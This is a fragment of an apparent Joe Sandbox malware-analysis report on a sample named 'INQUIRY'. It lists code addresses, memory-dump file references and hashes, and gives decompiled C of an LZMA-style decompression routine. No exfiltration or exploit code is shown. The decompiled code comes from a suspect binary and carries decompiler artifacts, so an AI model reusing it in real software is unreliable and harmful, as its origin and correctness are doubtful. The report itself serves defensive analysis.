                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x0040640d

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                          • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406355() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xa;
                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                          					} else {
                          						 *(__ebp - 0x84) = 9;
                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          					}
                          					while(1) {
                          						 *(_t613 - 0x54) = _t606;
                          						while(1) {
                          							L133:
                          							_t531 =  *_t606;
                          							_t589 = _t531 & 0x0000ffff;
                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          							if( *(_t613 - 0xc) >= _t565) {
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          								 *(_t613 - 0x40) = 1;
                          								_t532 = _t531 - (_t531 >> 5);
                          								 *_t606 = _t532;
                          							} else {
                          								 *(_t613 - 0x10) = _t565;
                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          							}
                          							if( *(_t613 - 0x10) >= 0x1000000) {
                          								goto L139;
                          							}
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								L170:
                          								_t568 = 0x22;
                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          								_t535 = 0;
                          								L172:
                          								return _t535;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L139:
                          							_t533 =  *(_t613 - 0x84);
                          							while(1) {
                          								 *(_t613 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t613 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t613 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t534 =  *( *(_t613 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t570);
                          											_push(9);
                          											_pop(_t571);
                          											_t609 = _t538 / _t570;
                          											_t540 = _t538 % _t570 & 0x000000ff;
                          											asm("cdq");
                          											_t604 = _t540 % _t571 & 0x000000ff;
                          											 *(_t613 - 0x3c) = _t604;
                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          												L10:
                          												if(_t612 == 0) {
                          													L12:
                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t612 = _t612 - 1;
                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          												} while (_t612 != 0);
                          												goto L12;
                          											}
                          											if( *(_t613 - 4) != 0) {
                          												GlobalFree( *(_t613 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t613 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t45 = _t613 - 0x48;
                          											 *_t45 =  *(_t613 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t613 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t613 - 0x40);
                          											if(_t546 ==  *(_t613 - 0x74)) {
                          												L20:
                          												 *(_t613 - 0x48) = 5;
                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t613 - 0x74) = _t546;
                          											if( *(_t613 - 8) != 0) {
                          												GlobalFree( *(_t613 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          											 *(_t613 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          											 *(_t613 - 0x84) = 6;
                          											 *(_t613 - 0x4c) = _t553;
                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          											 *(_t613 - 0x54) = _t606;
                          											goto L133;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											_t67 = _t613 - 0x70;
                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          											if( *(_t613 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t606;
                          											_t589 = _t531 & 0x0000ffff;
                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          											if( *(_t613 - 0xc) >= _t565) {
                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          												 *(_t613 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												 *_t606 = _t532;
                          											} else {
                          												 *(_t613 - 0x10) = _t565;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          											}
                          											if( *(_t613 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											}
                          										case 5:
                          											goto L137;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 8:
                          											goto L0;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L89;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t258;
                          											0 | _t258 = _t258 + _t258 + 9;
                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          											goto L75;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
